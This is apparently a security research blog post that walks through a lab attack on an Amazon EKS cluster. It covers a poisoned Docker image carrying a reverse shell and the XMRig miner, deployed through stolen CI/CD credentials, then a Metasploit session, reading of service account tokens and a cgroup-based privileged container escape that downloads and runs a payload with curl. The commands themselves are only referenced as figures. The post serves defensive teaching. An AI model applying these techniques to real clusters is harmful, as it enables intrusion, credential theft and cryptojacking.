Anatomy of a Kubernetes Attack - How Untrusted Docker Images Fail Us

PART TWO OF A SERIES.

 

This post illustrates how an attacker could use a poisoned docker image to break out of a container and gain access to the hosts\nodes in a Kubernetes cluster.

 

In the first part of this blog series, Infrastructure as Code: Terraform, AWS EKS, Gitlab & Prisma Cloud, I went through the scenario of building out an Amazon EKS cluster using Terraform and a VCS integration with Gitlab. I also covered an initial Daemonset deployment of the Palo Alto Networks Prisma agent to the nodes on the newly provisioned cluster. In the second part of this series, we will look at some aspects of a Kubernetes attack and in a follow-up installment, how Palo Alto Networks Prisma Compute can be used to prevent related Kubernetes attacks.

 

Microsoft recently released a Kubernetes attack matrix (similar to MITRE’s ATT&CK framework) that I feel is a good reference for walking through some of the aspects of an example Kubernetes attack. For this blog, I’ll be covering techniques in Initial Access, Execution, Persistence and Privilege Escalation Tactic phases.

 

ConSec_Prisma_Pt2_1

Figure 1: Microsoft Kubernetes ATT&CK Matrix

 

The environment I’m using for this blog is an Amazon EKS cluster with no Prisma agents installed to demonstrate the various stages of an attack. I also have a second EKS cluster that is running Prisma that I’ll use in the next blog to demonstrate how Prisma can protect the cluster. The CI/CD pipeline I’m using incorporates Gitlab Enterprise and a public Docker image repository. The C2 being used is from a Metasploit console, also hosted in AWS.

 

ConSec_Prisma_Pt2_2

Figure 2: Vulnerable Amazon EKS Cluster

 

Initial Access – Compromised Image

 

Imagine a scenario where a software developer unknowingly had their workstation compromised. During the breach, the attacker was able to collect the dev’s version control system (VCS) credentials. With the dev’s stolen credentials, the attacker plans to use the CI/CD pipeline to deploy a poisoned docker image to the Kubernetes cluster. This could either be done by backdooring a trusted image and pushing the updated image to the trusted repository (as was done previously by Optiv’s Dan Kiraly in his Azure container breakout blog series) or by changing a callout in the CI/CD build code to pull the image from a different source, which in my case, is a poisoned image from a public repository at Docker Hub.

 

In the scenario, I will be working through deployment of the poisoned image into the cluster. This will provide a foothold for an attacker to establish a beachhead and escalate privileges, depending on how the K8s cluster and it’s corresponding pods were deployed.

 

ConSec_Prisma_Pt2_3

Figure 2: Docker Hub poisoned image

 

ConSec_Prisma_Pt2_4

Figure 3: Changing the image repo path in gitlab-ci.yml from a trusted source to Github

 

The poisoned image was created offline and pushed to a publicly accessible Docker repo (see above). In this image, I’ve pulled Ubuntu:Latest from Docker and loaded the necessary prerequisites, including curl, a reverse listener binary and cryptocurrency mining software, XMRig. Once the image functions as expected, I pushed the image to my Docker repo.

 

In the image Figure 3 above, it shows that I’ve changed the image path in the app’s Gitlab CI file from the trusted Gitlab/Ubuntu:Latest location to a poisoned image available at optivrd/ubuntu:latest, located on Docker Hub. The next time a deployment process is triggered in the CI/CD pipeline, the poisoned image at Docker will be called and attached to the deployed container.

 

Execution – Running untrusted code inside of a container

 

The poisoned image being used contains an embedded reverse listener that will connect back to my Metasploit console and provides a shell when the container is deployed. Another option to get the binary on the image could be modifying the dockerfile in the CI/CD pipeline to either download the file externally via CMD upon container deployment or uploading the file for inclusion in the filesystem during the CI/CD build process.

 

ConSec_Prisma_Pt2_5

Figure 4: Reverse listener session established through Metasploit

 

ConSec_Prisma_Pt2_6

Figure 5: Session established with container spawned from poisoned Docker Image containing crypto-currency miner

 

ConSec_Prisma_Pt2_7

Figure 6: Listing of the / partition of container and “whoami” command

 

We can see from the images above that the container has spawned a connection back to the Metasploit console. With some additional recon, we see that the file system is indeed a container-related system (note the .dockerenv located in /). We can also see from the “whoami” command that the container is running as root.

 

Persistence – Backdoor Container

 

Attackers who have gotten partial access to a Kubernetes cluster can use existing weaknesses in the design and deployment of the cluster to establish persistence for their access. Some issues can include overly permissive permissions and lack of utilizing native RBAC. In this scenario, the attacker modified the code in the CI/CD pipeline to attach a poisoned image during the container deployment process. Now the attacker is provided access to the cluster every time a container with the poisoned image is deployed.

 

Armed with access and inherited permissions, an attacker could potentially capture the contents of the service account token mounted in the container. In our case, depending on how the container was deployed (e.g. privileged, separate service account, separate namespace), we may be able to get this useful information.

 

ConSec_Prisma_Pt2_8

Figure 7: Directory listing of /run/secrets/Kubernetes.io/serviceaccount

 

From the directory listing image above, we can see that every file and folder on the container filesystem is owned by root. This indicates that either the container is running as privileged or the container is running as the root user, in either case, a bad practice. In checking the path at “/run/secrets/Kubernetes.io/serviceaccount”, we can see that the CA cert, namespace and token are available to us. Even with this information, we will still not be able to connect to the EKS API server due to us needing the additional AWS API credentials, specifically the API Access Key ID and Secret Access Key, which are needed by awscli for Kubectl to connect directly.

 

In cases where the API server is deployed and configured by the end user (as opposed to Amazon EKS, Azure AKS and Google GKS managed Kubernetes services) the CA cert, namespace and token information would be all that was needed to connect to the API server using kubectl.

 

Some other examples of risky permissions for Kubernetes includes listing secrets, service accounts with privileged permissions, user impersonation and the ability to brute force token IDs using default service accounts. With that in mind, it should be noted that securing K8s clusters is a non-trivial exercise and is also difficult to maintain administratively. For example, on a default installation of kubeadm, there are approximately 43 RoleBindings\ClusterRoleBindings, 51 Roles\ClusterRoles and 39 subjects. More information about container security issues and recommendations can be found at NIST SP 800-190.

 

Privileged Escalation – Breaking out of the Container

 

With my reverse listener session established, I now move onto escalating my foothold to the underlying hosts/nodes in the Kubernetes cluster. For this phase, I’ll exploit a vulnerability discovered by security researcher Felix Wilhelm and expanded on by the folks at Trail of Bits. This vulnerability affects docker containers run with the –privileged flag set and works by abusing the Linux cgroup “notification on release” feature. As this vulnerability demonstrates, launching privileged docker containers is dangerous and should be avoided for almost all scenarios, due to the full access to the host devices and the lack of restrictions from seccomp, AppArmor and other Linux safeguards.

 

Inside the docker container, I run the commands to escape the container. Included in the commands is a curl request to download my Metasploit reverse listener, set the executable bit and execute the commands on the underlying host.

 

ConSec_Prisma_Pt2_9

Figure 8: Running the container breakout command

 

After running the command in the container’s shell, the Metasploit console shows that a host has connected back and a new session has been established. By running the command “uname -a”, I can see from the kernel version and information provided that this is one of my Kubernetes nodes, not the container. I also see that a .dockerenv file is not present in the root of the filesystem. Finally, I can see the shell-x64.elf binary that was downloaded and used for a connection back to my MSF console.

 

ConSec_Prisma_Pt2_10

Figure 9: Directory listing of the Kubernetes host after the container breakout

 

With access to the underlying Kubernetes hosts, I can continue moving through the different phases of the attack framework including Defense Evasion, Credential Access, Discovery and Lateral Movement. My activity could potentially include wiping logs and establishing a more permanent presence on the nodes.

 

Hopefully this post helped you understand how a single workstation breach could impact an organization’s CI/CD pipeline and infrastructure. In the next blog installment, I’ll be looking at the techniques covered in this attack and demonstrate how Palo Alto Networks Prisma Compute can help to address issues in the CI/CD pipeline and Kubernetes cluster.

Sr. Research Scientist | Optiv
Rob Brooks has been involved in Information Security for 20 years and has served as a CISO, Senior Architect, Sysadmin and Engineer along the way. Rob currently works as a Sr. Research Scientist in Optiv's R&D group, managing the company’s private cloud and helping research security products.